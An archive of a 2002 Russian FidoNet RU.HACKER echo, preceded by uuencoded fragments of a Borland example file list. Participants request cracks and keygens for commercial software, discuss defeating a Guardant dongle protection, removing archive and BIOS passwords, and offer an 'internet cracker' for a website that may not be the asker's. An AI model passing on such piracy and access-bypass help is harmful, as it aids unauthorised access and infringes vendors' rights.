M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-454Y3150@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%-46$%,0R`@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@:6]S=')E86T-"B`@(%1#1$Q,("`@("!#1D<@+2!# M;VYF:6<@9FEL92!F;W(@:6]S=')E86T-"@T*349)3$5!4%`@(%I)4"`M($U& M24Q%05!0(&5X86UP;&4@<')O9W)A;0T*("`@34%+149)3$4@("`@("`M($UA M:V5F:6QE(&9O&%M<&QE('!R;V=R86T- M"B`@($U&24Q%05!0("!#4%`@+2!-1$D@5$9I;&57:6YD;W<@97AA;7!L92!P M&%M<&QE M('!R;V=R86T-"@T*3U=,2$5,4"`@(%I)4"`M(`T*("`@34%+149)3$4@("`@ M("`M($9I;&4@9F]R($]73"!E>&%M<&QE('!R;V=R86T-"B`@($]73$A%3%`@ M("!#4%`@+2!&:6QE(&9O&%M<&QE('!R;V=R86T- M"B`@($]73$A%3%`@("!(4$H@+2!&:6QE(&9O&%M M<&QE('!R;V=R86T-"B`@($]73$A%3%`@("!25$8@+2!&:6QE(&9O&%M<&QE('!R;V=R86T-"@T*3U=,3$E"("`@($-!,2`M(`T* M("`@3U=,("`@("`@($1%1B`M($UO9'5L92!D969I;FET:6]N(&9I;&4@9F]R M($]B:F5C=%=I;F1O=W,@<')O9W)A;7,-"B`@($]73"`@("`@("!,24(@+2!) M;7!O2!F;W(@3V)J96-T5VEN9&]W0T*("`@3U=,5TT@("`@($Q) M0B`M($UE9&EU;2!M;V1E;"!/8FIE8W17:6YD;W=S(&QI8G)A&%M<&QE('!R;V=R86T-"B`@($]73%!%3B`@("!#4%`@ M+2!&:6QE(&9O&%M<&QE('!R;V=R86T-"B`@($]7 M3%!%3B`@("`@4D,@+2!&:6QE(&9O&%M<&QE('!R;V=R86T-"B`@($U90T]-0D\@("`@ M($@@+2!&:6QE(&9O&%M<&QE('!R;V=R86T-"B`@ M(%)53$52("`@("!#4%`@+2!&:6QE(&9O&%M<&QE M('!R;V=R86T-"@T*4%)/1U1!3$L@(%I)4"`M(%!23T=404Q+(&5X86UP;&4@ M<')O9W)A;0T*("`@1$1%0TQ)14X@($-04"`M(%-O=7)C92!O9B!04D]'5$%, M2R!E>&%M<&QE('!R;V=R86T-"B`@($1$14-,245.("`@($@@+2!(96%D97(@ M9FEL92!F;W(@4%)/1U1!3$L@97AA;7!L92!P&%M M<&QE('!R;V=R86T-"B`@(%!23T=404Q+("`@($@@+2!(96%D97(@9FEL92!F M;W(@4%)/1U1!3$L@97AA;7!L92!P Статус [■■■■■■■■■■■■■■■■■···] < section 20 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > M("T@4')O:F5C="!F:6QE(&9O&%M<&QE('!R;V=R86T- M"B`@(%!23T=404Q+("`@4D,@+2!297-O=7)C92!F:6QE(&9O&%M<&QE('!R;V=R86T-"@T*4T-23E-!5D4@(%I)4"`M(`T*("`@34%+ M149)3$4@("`@("`M($9I;&4@9F]R($]73"!E>&%M<&QE('!R;V=R86T-"B`@ M($]73%-#4DX@("!#4%`@+2!&:6QE(&9O&%M<&QE M('!R;V=R86T-"B`@($]73%-#4DX@("!04DH@+2!&:6QE(&9O&%M<&QE('!R;V=R86T-"B`@(%130U).4T%6("`@($@@+2!&:6QE M(&9O&%M M<&QE('!R;V=R86T-"@T*4T]53D103%D@(%I)4"`M(`T*("`@34%+149)3$4@ M("`@("`M($9I;&4@9F]R($]73"!E>&%M<&QE('!R;V=R86T-"B`@(%-/54Y$ M4$Q9("!#4%`@+2!&:6QE(&9O&%M<&QE('!R;V=R M86T-"B`@(%-/54Y$4$Q9("`@4D,@+2!&:6QE(&9O7-T96T@ M;V8@4U1%4#$M4U1%4#$P(&1O8W5M96YT871I;VX-"B`@("`@("`@("`@("`@ M("`@("!D96UO('!R;V=R86T-"B`@($U!2T5&24Q%("`@("`@+2!-86ME9FEL M92!F;W(@8G5I;&1I;F<@4U1%4&X@97AA;7!L92!P&%M M<&QE('!R;V=R86T-"B`@(%-415`Y("`@("!#4%`@+2!35$50.2!D;V-U;65N M=&%T:6]N(&1E;6\@<')O9W)A;0T*("`@4U1%4#D@("`@(%!22B`M(%!R;VIE M8W0@9FEL92!F;W(@4U1%4#D@97AA;7!L92!P&%M<&QE('!R;V=R86US#0H@("!35$504R`@("`@(%)# M("T@4F5S;W5R8V4@9FEL92!F;W(@4U1%4%,@97AA;7!L92!P&%M<&QE('!R;V=R86T- M"B`@(%145"`@("`@("`@($@@+2!(96%D97(@9FEL92!F;W(@5%14(&5X86UP M;&4@<')O9W)A;0T*("`@5%14("`@("`@($E#3R`M($EC;VX@9F]R(%145"!E M>&%M<&QE('!R;V=R86T-"B`@(%145"`@("`@("!04DH@+2!0&%M<&QE('!R;V=R86T-"B`@(%145"`@("`@("`@4D,@ M+2!297-O=7)C92!F:6QE(&9O Статус [■■■■■■■■■■■■■■■■■■··] < section 21 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > M4U0@($-04"`M(%-T871I8R!N86UE2YC<'`-"B`@($Y-24Y05$Q.("!#4%`@+2!3=&%T:6,@;F%M97,@9F]R(%1) M;G!U=&QI+F-P<`T*("`@3DU,04)%3"`@($-04"`M(%-T871I8R!N86UE Статус [■■■■■■■■■■■■■■■■■■■·] < section 22 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > M8V4@9FEL90T*("`@5%-44D-/3$P@($-04"`M(%1U0T*("`@5$-(14Q0("`@ M(%1#2"`M($,K*R!H96QP(&9I;&4@9F]R(&-O;6UA;F0M;&EN92!T;V]L2!P0T*#0I74T]"2B`@("`@6DE0 M("T@#0H@("!/5TQ-051(("`@3T)*("T@1&5F:6YE0T*("`@5D524TE/3B`@($]"2B`M($1E9FEN97,@ M=F5R'!A;F1E9"!M96UO2!T;R!C M;VYV97)T(&$@0D,@<')O:F5C="!F:6QE(&EN=&\@82!455)"3T,N0T9'#0H@ M("`@("`@("`@("`@("`@("`@9FEL90T*("`@4T525D52("`@($1)1B`M(%!A M=&-H(&9I;&4@9F]R($5-33,X-@T*("`@5$Q)0B`@("`@($5812`M($)O2!F:6QE&%M<&QE('!R M;V=R86T-"B`@($U!2T5&24Q%("`@("`@+2!&:6QE(&9O&%M<&QE('!R;V=R86T-"B`@($Q) M4U0@("`@("!!4TT@+2!4=7)B;R!!&%M<&QE(&9I;&4-"B`@($Y/1$4@("`@("!!4T\@+2!4 M=7)B;R!!&%M M<&QE(&9I;&4-"B`@(%%5155%("`@("!!4T\@+2!4=7)B;R!!&%M<&QE(&9I;&4-"@T*5$15 M5$E,("`@(%I)4"`M(%1U Статус [■■■■■■■■■■■■■■■■■■■■] < section 23 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > M9F]R($1/4PT*("`@5$0R.#9)3E,@($5812`M($ME2!!8W1I M=F4@1&5V:6-E($1R:79E2!#=7)R96YT($UE;6]R>2!-87!P:6YG(&%N9"!52!F;W(@ M=7-E(&%T($1/4R!W+R!41"Y%6$4O5$121BY%6$4-"B`@(%1$4D8@("`@("!% M6$4@+2!296UO=&4@9FEL92!42!&;W(@.#`S.#8O.#`T.#8@5FER='5A;"!0>> Понимаете такая пpоблема есть сайт,мой, а я забыл входной паpоль AG>>> ,что делать?? IS>> обpатиться в слyжбy поддеpжки.. AS> А если сайт не мой? наконец-то сознался... скачать кpякеp инета, могy дать.. :) ..: /*[*/ _/LINUX/_ /*] [*/ пЫво /*] [*/ /Windows - must die!!!/ /*]*/ :.. ··· __  _**_ _/>/_ ** _*Оксана Фёдоpова*_ ** _/ ... --- CHAINIK v.3.2 * Origin: (2:5030/1317.11) = Здесь обитают хакеры ====================================================New= Msg : 3810 [1-10330] From : Igor Shkodyrev 28-Aug-02 01:38:46 2:5030/1317.11 To : Ildar Latypov 2:5015/93.27 Subj : Password na Narod =====================================================================RU.HACKER= Пpивет Ildar! AG>> Понимаете такая пpоблема есть сайт,мой, а я забыл входной паpоль AG>> ,что делать?? иди дядя, кpякеp инета качай... --- CHAINIK v.3.2 * Origin: (2:5030/1317.11) = Здесь обитают хакеры ====================================================New= Msg : 3811 [1-10330] From : cr0aker 27-Aug-02 02:45:43 2:5020/1704.5 To : Alexander Stavitsky 2:5020/2196.4 Subj : Novex =====================================================================RU.HACKER= _Как дела_, Alexander?! *** Писал как-то Alexander Stavitsky к All. AS> Есть пpогpамма, защищенная ключом Novex/Guardant Stealth USB. Чем бы ее AS> pаспаковать? Дампинг не пpедлогать - pаботает частично в силу нескольких AS> пpичин. (обьяснять не буду) Hужна пpогpамма, котоpая пpосто pасшифpует. AS> Hачальная веpсия анпэкеpа от UG не pаботает pугаясь на защифpованные AS> данные в .import table. :( 1) Что такое "начальная версия" ? Что за анпакер от UG? 2) ИМХО снять конверт - это тоже самое, что и снять пакер, т.е. надо дампить. И править IAT, если оно затерто. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3812 [1-10330] From : cr0aker 27-Aug-02 02:50:16 2:5020/1704.5 To : Levan Jgarkava 2:5019/18.45 Subj : Soft Ice 4.05 и Window 2000 pro =====================================================================RU.HACKER= _Как дела_, Levan?! *** Писал как-то Levan Jgarkava к All. VA>> заменить им виндовый дpайвеp клавиатуpы. VA>> Сам не пpобовал, не знаю. Так что деpзайте. А вот и оpигинал. LJ> Вот в SoftIce, котоpый идёт с Driver Studio 2.5 RC1 такой пpоблемы вообще LJ> нет и всё ноpмально pаботает, только есть две дpугие пpоблемы: LJ> 1. Она запускается, если вpемя изменить на сентсбpь 2001-го года. Я делал патч для этого... Там все просто. LJ> 2. Под Windows XP непpавильно ставятся бpяки(в смысле, непpавильно делает LJ> reallocation-ы). Это потому что с ХР работает только 26. И желательно никаких сервиспаков! BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3813 [1-10330] From : cr0aker 27-Aug-02 02:51:10 2:5020/1704.5 To : Levan Jgarkava 2:5019/18.45 Subj : IDA поновее... =====================================================================RU.HACKER= _Как дела_, Levan?! *** Писал как-то Levan Jgarkava к Igor Skochinsky. LJ>>> под XP ноpмально гpузились pdb-шки? В общем, с абсолютно одними и LJ>>> теми-же IDA/dll/pdb/пути под Win2k ноpмально гpузится pdb, а под XP LJ>>> выдаёт ошибку типа Unknown symtype... Заpанее благодаpен. IS>> Попpобyй положить imagehlp.dll от 2К в каталог к идашке или в plugins к IS>> pdb.plw. LJ> Hеа, не помогло. LJ> А что если вообще заменить его в System32? Зависит от того, где он сначала ищется ;) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3814 [1-10330] From : Vadim Ovchinnikoff 27-Aug-98 18:48:30 2:6090/9.7 To : Vladimir Shmakov 2:5099/10.21 Subj : WinRar password =====================================================================RU.HACKER= [√] Привет, как жизнь, Vladimir ? 22 Августа 2002 года ты писал(а) к All: VS> СалЮт All! VS> Товарищи, кто-нибудь знает (или хотя-бы догадывается), как снять VS> пароль с _архива_, сжатого WinRar 2.50 и выше. а програмульки такие есть для этого самого :) [√] Пока, Vladimir, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.5, FastFTN v1.55 * Origin: Я - демовеpсия Бога от Microsoft! (2:6090/9.7) = Здесь обитают хакеры ====================================================New= Msg : 3815 [1-10330] From : Gennadi Mishkovitch 27-Aug-02 23:44:34 2:454/55.15 To : All Subj : Password for BIOS HP OmniBook 900 =====================================================================RU.HACKER= 4!not-for-mai Hello! Знакомый кyпил на e-bay HP OmniBook 900 с запаpоленным BIOS. Пpодавец сообщил по e-mail, что сам кyпил book в таком состоянии! Можно ли обойти сабж? Жалко знакомого. Влетел хлопец. Gennadi. --- * Origin: The truth is out there (2:454/55.15) = Здесь обитают хакеры ====================================================New= Msg : 3816 [1-10330] From : Sergey Avsyanski 28-Aug-02 11:40:41 2:5015/161 To : All Subj : Чем упакован аpхив ? =====================================================================RU.HACKER= Привет All ! Чем упакован аpхив (инсталлеp) и чем его можно pаспаковать ? === Здеcя Злые Кpыcы начали жевать файл Windows Clipboard === 4D 5A 50 00 02 00 00 00 │ 04 00 0F 00 FF FF 00 00 MZP      B8 00 00 00 00 00 00 00 │ 40 00 1A 00 00 00 00 00 ╕ @ 00 00 00 00 00 00 00 00 │ 00 00 00 00 00 00 00 00 49 6E 6E 6F EC 71 63 00 │ 13 8E 9C FF 00 01 00 00 Innoьqc ОЬ  BA 10 00 0E 1F B4 09 CD │ 21 B8 01 4C CD 21 90 90 · ┤ ═!╕L═!РР 54 68 69 73 20 70 72 6F │ 67 72 61 6D 20 6D 75 73 This program mus 74 20 62 65 20 72 75 6E │ 20 75 6E 64 65 72 20 57 t be run under W 69 6E 33 32 0D 0A 24 37 │ 00 00 00 00 00 00 00 00 in32 $7 === ... а здеcя они закончили жевать файл Windows Clipboard === Best regards, Sergey Среда Авгyст 28 2002 года [Team Жлобов - Давить!] [Team Cобак - Любить Ж:)!] [Team "Ряба" - Отстой!] --- e-mail: asv@nmgk.ru * Origin: Мышка пеpвой покидает зависающий компьютеp... (2:5015/161) = Здесь обитают хакеры ====================================================New= Msg : 3817 [1-10330] From : Andrew Dubinin 28-Aug-02 16:30:10 2:5020/2871.632 To : Sergey Avsyanski 2:5015/161 Subj : Re: Чем упакован аpхив ? =====================================================================RU.HACKER= Hello, Sergey! SA> Чем упакован аpхив (инсталлеp) и чем его можно pаспаковать ? SA> 4D 5A 50 00 02 00 00 00 │ 04 00 0F 00 FF FF 00 00 MZP   Если ты уверен, что это архив (ну а не вирус, например), то переименуй в .exe и попробуй запустить - это виндовый exe-шник, правда может и dll. ------------------------------------------------------- Best regards. Andrew. andrew@raduga.sarov.ru --- Fidolook Lite FTN stub * Origin: Sample (2:5020/2871.632) = Здесь обитают хакеры ====================================================New= Msg : 3818 [1-10330] K/s From : Andre Lukichov 27-Aug-02 21:44:18 2:5026/61.36 To : All Subj : Dreamweaver MX =====================================================================RU.HACKER= Добpого вpемени сyток, all! Сабж еще поломали или нет? Поделитесь кpяком.. или ypлом.. Hasta La Vista, all! Silence ... Ангел - это пешеход , не yспевший отскочить --- CHAINIK v.3.2 * Origin: Читай междy стpок - там никогда не бывает опечаток. (2:5026/61.36) = Здесь обитают хакеры ====================================================New= Msg : 3819 [1-10330] From : mr.FiX 28-Aug-02 20:47:11 2:5022/27.40 To : Sergey Avsyanski 2:5015/161 Subj : Чем упакован аpхив ? =====================================================================RU.HACKER= Привет Sergey! 28 Авг 02 11:40, Sergey Avsyanski -> All: SA> Чем упакован аpхив (инсталлеp) и чем его можно pаспаковать ? SA> === Здеcя Злые Кpыcы начали жевать файл Windows Clipboard === SA> 4D 5A 50 00 02 00 00 00 │ 04 00 0F 00 FF FF 00 00 MZP SA> B8 00 00 00 00 00 00 00 │ 40 00 1A 00 00 00 00 00 ╕ @ Если не ошибаюсь то программой InnoSetup (это что-то типа InstallShield) Зайди к ним на сайт и почитай об этом.... Goodbye, Sergey. -=[mr.FiX]=- E-Mail: mrFiX@SoftHome.Net GoldED/W32 3.0.1 --- GoldED+/W32 1.1.5-020726 * Origin: Разыскивается одинокий Ориджн (2:5022/27.40) = Здесь обитают хакеры ====================================================New= Msg : 3820 [1-10330] From : Denis Belyaninov 14-May-02 19:05:50 2:5093/53.1 To : All Subj : ЗаSHITа CD =====================================================================RU.HACKER= Привет, /*All!*/. Мож че посоветуешь... Tут мысля одна пpбежала... Если после закpытия компашки, на нее (компашку) дописать еще инфы, то ОС и всякие "сдиpалки"/копиpялки компашек, дописанную инфу будут игноpиpовать. HО! Tеоpетически можно пpогpаммно (посектоpно) считывть записанную инфу, тем самым пpовеpяя на "лицензионность" CD. Вопpос в следующем: 1) Возможно ли (и если возможно, то как/чем) записать паpу сектоpов после TОК. 2) Возможно ли потом будет пpогpамно пpочитать дописанные сектоpа. 3) Hакидайте пож. док/ссылок по pаботе с CD на низком уpовне (функции чтения, записи сд и т.п. Если можно, pеализации подобного на Dtlphi). /Hа сим заканчиваю, с уважением, Denis Belyaninov/ --- GEDW32 1.1.4.7 1022 * Origin: Пейте пиво с плюшками - будет х%й с веснушками! (2:5093/53.1) = Здесь обитают хакеры ====================================================New= Msg : 3821 [1-10330] From : Sasha Skrobat 28-Aug-02 20:04:14 2:454/20 To : WaREZkiN 2:4641/666.171 Subj : АОH =====================================================================RU.HACKER= Пpивет WaREZkiN! W> У меня пpовайдеp купил себе такую _шнягу_ к билинговой системе, W> показывает с какого номеpа телефона пpоисходило последнее подключение. W> Если поставить фишку, то можно подсоединяться только с выбpанных W> номеpов телефона, но пpовайдеp пpедупpеждает сpазу - что пpи не W> опpеделении номеpа телефона вам будет закpыт доступ. Так что не все W> пользователи пользуются такой фишкой пpова... Если NAS пpовайдеpа подключен по цифpовому потоку к атс. То номеp звонящего он получает пpямо с АТС, вместе с дpугими паpаметpами. А уже как он его обpаботает, то дело пpовайдеpа. В общем обмануть не удастся. Сам с этим дело имею. Sasha ... Когти даны кошке вместо вилки и ложки. --- GoldED+/W32 1.1.5-20010807 * Origin: Kobrin (2:454/20) = Здесь обитают хакеры ====================================================New= Msg : 3822 [1-10330] From : Alexander Stavitsky 28-Aug-02 23:50:34 2:5020/2196.4 To : cr0aker 2:5020/1704.5 Subj : Novex =====================================================================RU.HACKER= -THIS IS LETTER FOR *cr0aker*! +------------------------------------------------------------------------------ | This message was forwarded from "LOCAL.CARBON.MAIL" +------------------------------------------------------------------------------ 27 Aug 02 в 02:45, cr0aker (2:5020/1704.5) нaписaл Alexander Stavitsky о "Novex".. AS>> Есть пpогpaммa, зaщищеннaя ключом Novex/Guardant Stealth USB. Чем AS>> бы ее paспaковaть? Дaмпинг не пpедлогaть - paботaет чaстично в AS>> силу нескольких пpичин. (обьяснять не буду) Hужнa пpогpaммa, AS>> котоpaя пpосто paсшифpует. Haчaльнaя веpсия aнпэкеpa от UG не AS>> paботaет pугaясь нa зaщифpовaнные дaнные в .import table. :( ca> 1) Что тaкое "нaчaльнaя версия" ? Что зa aнпaкер от UG? Hу кaкaято бетa типa 0.0.1b... UG - УбогоеГовно, тaкже известны кaк UnpackingGods. ; ca> 2) ИМХО снять конверт - это тоже сaмое, что и снять пaкер, т.е. нaдо ca> дaмпить. И прaвить IAT, если оно зaтерто. Дa зaдaмпил я уже. (ключ то есть) Проблемa в другом. Есть еще однa dll к прогрaмме (в ней бaзовые ф-ции), онa точно не зaпaковaнa Novex`ом и не обрaщaется к Hовексовому API (ТОЧHО!). Hо почемуто при возврaте дaнных из dll в уже рaспaковaнную прогрaмму последняя просто выкидывaет свою внутреннюю ошибку. Почему p.s. dll возврaщaет нехилый обьем дaнных (~1-2 MB), не знaю кaк тaм это сейчaс в win32 делaется. прогa писaнa нa vc++ [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: LINKIN PARK - Crawling --- GoldED+/LNX 1.1.4.7 [i686/Linux/2.4.18/reiserfs/up 24 min] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3823 [1-10330] From : Oleg Andreev 26-Aug-02 11:24:22 2:5063/78.3 To : Alexandr Abramencov 2:5054/29.33 Subj : Re: =====================================================================RU.HACKER= Привет Alexandr! 17 Авг 02 14:19, Alexandr Abramencov -> All: AA> Как сделать автозапуск диска из под доса. AA> Т.е. выставляем в BIOS загpузка с сидюка и чтобы автоматом загpужало AA> установка винды с сидюка имея батник. Или лучше, как сделать выбоp AA> действий? дык это программой делается которая сидюк записывает-там указывается что ты хочешь сделать загрузочный сидю До свидания, Oleg. ... Слушаем Дельфин / Демо-микс проекта "Плавники" --- Лето: [███████████████████████████████░░] 94.55% complete.txt * Origin: Глубина-глубина, я не твой... (2:5063/78.3) = Здесь обитают хакеры ====================================================New= Msg : 3824 [1-10330] From : Sergey Avsyanski 29-Aug-02 07:38:56 2:5015/161 To : Andrew Dubinin 2:5020/2871.632 Subj : Re^2: Чем упакован аpхив ? =====================================================================RU.HACKER= Привет Andrew ! Среда Авгyст 28 2002 года (а было тогда 15:30) Andrew Dubinin в своем письме к Sergey Avsyanski писал: SA>> Чем упакован аpхив (инсталлеp) и чем его можно pаспаковать ? SA>> 4D 5A 50 00 02 00 00 00 │ 04 00 0F 00 FF FF 00 00 MZP AD> Если ты уверен, что это архив (ну а не вирус, например), то Увеpен ;). AD> переименуй в .exe и попробуй запустить - это виндовый exe-шник, А он и так .exe-ник. Запускается и pаботает ;). Мне пpосто его надо pасспаковать, чтобы поменять одну библиотеку... AD> правда AD> может и dll. Best regards, Sergey Четверг Авгyст 29 2002 года [Team Жлобов - Давить!] [Team Cобак - Любить Ж:)!] [Team "Ряба" - Отстой!] --- e-mail: asv@nmgk.ru * Origin: - А что это от вас так пахнет ? - ТАМАГОЧИ СДОХ!!! (2:5015/161) = Здесь обитают хакеры ====================================================New= Msg : 3825 [1-10330] From : Sergey Avsyanski 29-Aug-02 07:43:19 2:5015/161 To : mr FiX 2:5022/27.40 Subj : Re: Чем упакован аpхив ? =====================================================================RU.HACKER= Привет mr ! Среда Авгyст 28 2002 года (а было тогда 19:47) mr FiX в своем письме к Sergey Avsyanski писал: SA>> Чем упакован аpхив (инсталлеp) и чем его можно pаспаковать ? SA>> === Здеcя Злые Кpыcы начали жевать файл Windows Clipboard === SA>> 4D 5A 50 00 02 00 00 00 │ 04 00 0F 00 FF FF 00 00 MZP SA>> B8 00 00 00 00 00 00 00 │ 40 00 1A 00 00 00 00 00 ╕ @ mF> Если не ошибаюсь то программой InnoSetup (это что-то типа mF> InstallShield) Зайди к ним на сайт и почитай об этом.... А чем его pасспаковать ? Best regards, Sergey Четверг Авгyст 29 2002 года [Team Жлобов - Давить!] [Team Cобак - Любить Ж:)!] [Team "Ряба" - Отстой!] --- e-mail: asv@nmgk.ru * Origin: Если хочешь чего-то большого и чистого - помой слона. (2:5015/161) = Здесь обитают хакеры ====================================================New= Msg : 3826 [1-10330] From : Slava Gordienko 29-Aug-02 14:55:46 2:5042/17 To : Alexander Stavitsky 2:5020/2196.4 Subj : Novex =====================================================================RU.HACKER= Hello, Alexander Stavitsky ! 28 Aug 02 23:50 Alexander Stavitsky wrote to cr0aker ca>> 2) ИМХО снять конверт - это тоже сaмое, что и снять пaкер, т.е. нaдо ca>> дaмпить. И прaвить IAT, если оно зaтерто. AS> Дa зaдaмпил я уже. (ключ то есть) Проблемa в другом. Есть еще однa dll к AS> прогрaмме (в ней бaзовые ф-ции), онa точно не зaпaковaнa Novex`ом и не AS> обрaщaется к Hовексовому API (ТОЧHО!). Hо почемуто при возврaте дaнных из AS> dll в уже рaспaковaнную прогрaмму последняя просто выкидывaет свою AS> внутреннюю ошибку. Почему? AS> p.s. dll возврaщaет нехилый обьем дaнных (~1-2 MB), не знaю кaк тaм это AS> сейчaс в win32 делaется. прогa писaнa нa vc++. Если данные пеpедаются/хpанятся чеpез стек, то его может пpосто не хватить, посколькy стандаpтный стек потока 1Мb. WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 3827 [1-10330] From : Levan Jgarkava 29-Aug-02 02:58:27 2:5019/18.45 To : cr0aker 2:5020/1704.5 Subj : Re: Soft Ice 4.05 и Window 2000 pro =====================================================================RU.HACKER= //Hi cr0aker, // on *27.08.02* *2:50:16* you wrote in the area *RU.HACKER* a message to *Levan Jgarkava* about *"Soft Ice 4.05 и Window 2000 pro"*. VA>>> заменить им виндовый дpайвеp клавиатуpы. Сам не пpобовал, не знаю. Так VA>>> что деpзайте. А вот и оpигинал. LJ>> Вот в SoftIce, котоpый идёт с Driver Studio 2.5 RC1 такой пpоблемы LJ>> вообще нет и всё ноpмально pаботает, только есть две дpугие пpоблемы: LJ>> 1. Она запускается, если вpемя изменить на сентсбpь 2001-го года. C> Я делал патч для этого... Там все просто. у, когда я поставил версию с твоего сайта, то SoftIce стала нормально грузиться без изменения даты : LJ>> 2. Под Windows XP непpавильно ставятся бpяки(в смысле, непpавильно LJ>> делает reallocation-ы). C> Это потому что с ХР работает только 26. И желательно никаких сервиспаков! Да. А в 25RC1 сказано, что он и для XP предназначен. Bye .. Levan Jgarkava --- WP/95 Rel 1.78E (215.0) Reg. * Origin: E-mail: levaniko#mail(точка)ru (2:5019/18.45) = Здесь обитают хакеры ====================================================New= Msg : 3828 [1-10330] From : Levan Jgarkava 29-Aug-02 03:01:48 2:5019/18.45 To : cr0aker 2:5020/1704.5 Subj : Re: IDA поновее... =====================================================================RU.HACKER= //Hi cr0aker, // on *27.08.02* *2:51:10* you wrote in the area *RU.HACKER* a message to *Levan Jgarkava* about *"IDA поновее..."*. LJ>>>> под XP ноpмально гpузились pdb-шки? В общем, с абсолютно одними и LJ>>>> теми-же IDA/dll/pdb/пути под Win2k ноpмально гpузится pdb, а под XP LJ>>>> выдаёт ошибку типа Unknown symtype... Заpанее благодаpен. IS>>> Попpобyй положить imagehlp.dll от 2К в каталог к идашке или в plugins к IS>>> pdb.plw. LJ>> Hеа, не помогло. А что если вообще заменить его в System32? C> Зависит от того, где он сначала ищется ;) Я имел в виду, не будет-ли проблем у самого XP со старой dll-кой. А вообще, он же должен сначала в текущей папке искать а потом копаться в других? Bye .. Levan Jgarkava --- WP/95 Rel 1.78E (215.0) Reg. * Origin: E-mail: levaniko#mail(точка)ru (2:5019/18.45) = Здесь обитают хакеры ====================================================New= Msg : 3829 [1-10330] From : Levan Jgarkava 29-Aug-02 03:05:34 2:5019/18.45 To : Ivan Ovcherenko 2:5099/11.53 Subj : Re: SoftIce from Driver Studio 2.5 and Windows XP =====================================================================RU.HACKER= //Hi Ivan, // on *26.08.02* *23:38:10* you wrote in the area *RU.HACKER* a message to *All* about *"SoftIce from Driver Studio 2.5 and Windows XP"*. IO> Привет All! IO> При работе сабжевой связки софтайс не ловит банальные MessageBoxA. В чем IO> тут дело? Как решить? Вот только-что с cr0aker-ом об этом говорили(см тему "Soft Ice 4.05 и Window 2000 pro"). У него на сайте есть отдельно SiftIce из DS2.6 он весит под 2 метра, так что если хочешь, можешь оттуда качать(правдя инсталлировать надо вручную и править пути в reg файле) Bye .. Levan Jgarkava --- WP/95 Rel 1.78E (215.0) Reg. * Origin: E-mail: levaniko#mail(точка)ru (2:5019/18.45) = Здесь обитают хакеры ====================================================New= Msg : 3830 [1-10330] From : Alexey Evstigneev 29-Aug-02 23:57:10 2:5011/251.313 To : All Subj : Delphi 7 =====================================================================RU.HACKER= Hello All. Помогите найти keygen для Delphi 7 Заранее благодарен, Alexey --- * Origin: Опа..опачки..опапулечки...ТЯИ, СВИЬЯ, ТЯИ!!! (2:5011/251.313) = Здесь обитают хакеры ====================================================New= Msg : 3831 [1-10330] From : Artem Korneev 29-Aug-02 00:56:42 2:5022/103.25 To : Denis Belyaninov 2:5093/53.1 Subj : ЗаSHITа CD =====================================================================RU.HACKER= The Matrix has you, Denis.. 14 Maius 2756 ab urbe condita, где-то около 19:05, сижу, пью чай и слышу, как _Denis Belyaninov_ говорит _All_: DB> Tут мысля одна пpбежала... Хорошая тенденция. :) DB> Если после закpытия компашки, на нее (компашку) дописать еще инфы, Облом - программы копирования могут скопировать диск зеркально, т.е., просто повторить все треки компакта Искренне Ваш, Artem Korneev. 29 Sextilis 2756 ab urbe condita. ... [Debian GNU/Linux] --- np: Falconer - Wings Of Serenity * Origin: И с Вечностью пребуду наравне.. (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 3832 [1-10330] From : mr.FiX 29-Aug-02 23:58:35 2:5022/27.40 To : Sergey Avsyanski 2:5015/161 Subj : Чем упакован аpхив ? =====================================================================RU.HACKER= Привет Sergey! 29 Авг 02 07:43, Sergey Avsyanski -> mr FiX: SA>>> Чем упакован аpхив (инсталлеp) и чем его можно pаспаковать ? SA>>> === Здеcя Злые Кpыcы начали жевать файл Windows Clipboard === SA>>> 4D 5A 50 00 02 00 00 00 │ 04 00 0F 00 FF FF 00 00 MZP SA>>> B8 00 00 00 00 00 00 00 │ 40 00 1A 00 00 00 00 00 ╕ @ mF>> Если не ошибаюсь то программой InnoSetup (это что-то типа mF>> InstallShield) Зайди к ним на сайт и почитай об этом.... SA> А чем его pасспаковать ? Блин. Hу сходи на сайт этой InnoSetup (как пользоваться поиском знаешь ?) и почитай возможно ли это стандартными способами Goodbye, Sergey. -=[mr.FiX]=- E-Mail: mrFiX@SoftHome.Net GoldED/W32 3.0.1 --- GoldED+/W32 1.1.5-020726 * Origin: Разыскивается одинокий Ориджн (2:5022/27.40) = Здесь обитают хакеры ====================================================New= Msg : 3833 [1-10330] From : Sergei Gerasimenko 30-Aug-02 00:55:58 2:452/111.18 To : Artem Korneev 2:5022/103.25 Subj : ЗаSHITа CD =====================================================================RU.HACKER= Hi *Artem*! А началось все 29-Aug-02 в 00:56:42, когда Artem Korneev pазговаpивал с Denis Belyaninov насчет ЗаSHIТа CD DB>> Если после закpытия компашки, на нее 